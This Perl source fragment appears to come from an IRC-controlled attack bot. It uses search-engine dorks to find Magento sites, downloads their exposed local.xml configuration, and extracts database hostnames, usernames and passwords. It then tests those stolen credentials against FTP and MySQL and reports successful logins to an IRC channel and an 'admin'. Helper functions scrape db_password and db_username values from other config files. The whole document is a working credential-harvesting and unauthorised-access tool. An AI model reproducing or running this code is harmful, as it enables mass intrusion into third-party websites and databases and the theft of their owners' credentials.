sub magento() { my $chan = $_[0]; my $bug = $_[1]; my

1. sub magento() {
2. my $chan = $_[0];
3. my $bug = $_[1];
4. my $dork = $_[2];
5. my $engine = $_[3];
6. my $count = 0;
7. my @list = &search_engine($chan,$bug,$dork,$engine,$mglogo);
8. my $num = scalar(@list);
9. if ($num > 0) {
10. foreach my $site (@list) {
11. $count++;
12. if ($count == $num-1) { &msg("$chan","$mglogo15(7@2$engine15)0,1 THE END "); }
13. my $vuln = "http://".$site."/app/etc/local.xml";
14. my $html = &get_content($vuln);
15. if ($html =~ /dbname/i) {
16. my $serverIP ="";
17. if ($html =~ /<host><!\[\CDATA\[(.*)\]\]\><\/host>/) {$serverIP=$1;}
18. if ($html =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/){$user=$1;}
19. if ($html =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/){$pass=$1;}
20. if ($html =~ /<dbname><!\[CDATA\[(.*)\]\]\><\/dbname>/){$dbname=$1;}
21. &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]hostname:2".$serverIP."");
22. &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]username:2".$user."");
23. &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]password:2".$pass."");
24. &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]dbname :2".$dbname."");
25. if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];}
26. my $ceklog = "ftp://".$usr.":".$pass."@".$site."";
27. my $ceklog2 = "ftp://".$user.":".$pass."@".$site."";
28. my $ftplog = &get_content($ceklog);
29. my $ftplog2 = &get_content($ceklog2);
30. if ($ftplog =~ /ftp/) {
31. &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass."");
32. &msg("$chan","12[+]$$mglogo4$engine 12FTP[+]Success send To Admin");
33. }
34. if ($ftplog2 =~ /ftp/) {
35. &msg("$admin","12[+]$$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass."");
36. &msg("$chan","12[+]$$mglogo4$engine 12FTP[+]Success send To Admin");
37. }
38. my $hosts = "http://".$site;
39. if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
40. $host = $2;
41. &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$mglogo);sleep(1);
42. &msg("$chan","!ftp ".$host." ".$user." ".$pass."");
43. if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; }
44. &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$mglogo);sleep(1);
45. &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass."");
46. } }
47. }
48. }
49. }
50. ##################################################################################
51. sub ftp_connect {
52. my $url = $_[0];
53. my $host = $_[1];
54. my $user = $_[2];
55. my $pass = $_[3];
56. my $chan = $_[4];
57. my $engine = $_[5];
58. my $logo = $_[6];
59. my $success = 1;
60. use Net::FTP;
61. my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
62. $success = 0 if $ftp->login($user,$pass);
63. $ftp->quit;
64. if ($success == 0) {
65. &msg("$admin","$logo4$engine 5,1<=>9,1FTP Accepted 5<=>4 http://".$host." |7 ".$user.":".$pass." ");sleep(2);
66. }
67. }
68.  
69. sub dbi_connect () {
70. my $host = $_[0];
71. my $user = $_[1];
72. my $pass = $_[2];
73. my $dtbs = $_[3];
74. my $chan = $_[4];
75. my $engine = $_[5];
76. my $logo = $_[6];
77. my $port = "3306";
78. my $platform = "mysql";
79. my $dsn = "dbi:$platform:$dtbs:$host:$port";
80. my $DBIconnect= DBI->connect($dsn,$user,$pass);
81. if ($DBIconnect) {
82. &msg("$chan","$logo4$engine 5,1<=>9,1SQL Accepted 5<=> 4[+]15 http://".$host." 4[+]13username:15".$user." 4[+]13password:15".$pass." 4[+]13dbname:15".$dbname."");
83. &msg("$admin","$logo4$engine 5,1<=>9,1SQL Accepted 5<=> 4[+]15 http://".$host." 4[+]13username:15".$user." 4[+]13password:15".$pass." 4[+]13dbname:15".$dbname."");
84. }
85. }
86. sub getUserPass() {
87. my $string = $_[0];
88. my @lol = split("\r\n", $string);
89. my $pass = "";
90. my $user = "";
91. foreach my $line (@lol) {
92. if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
93. $pass = $3;
94. }
95. if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
96. $user = $3;
97. }
98. }
99. return $user.":Viva-Byroe.Net:".$pass;
100. }
101.  
102. sub getinfo() {
103. my $string = $_[0];
104. my @lol = split("\r\n", $string);
105. my $pass = "";
106. my $user = "";
107. my $dbs = "";
108. foreach my $line (@lol) {
109. if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
110. $pass = $3;
111. }
112. if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
113. $user = $3;
114. }
115. if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
116. $dbs = $3;
117. }
118. }
119. return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
120. }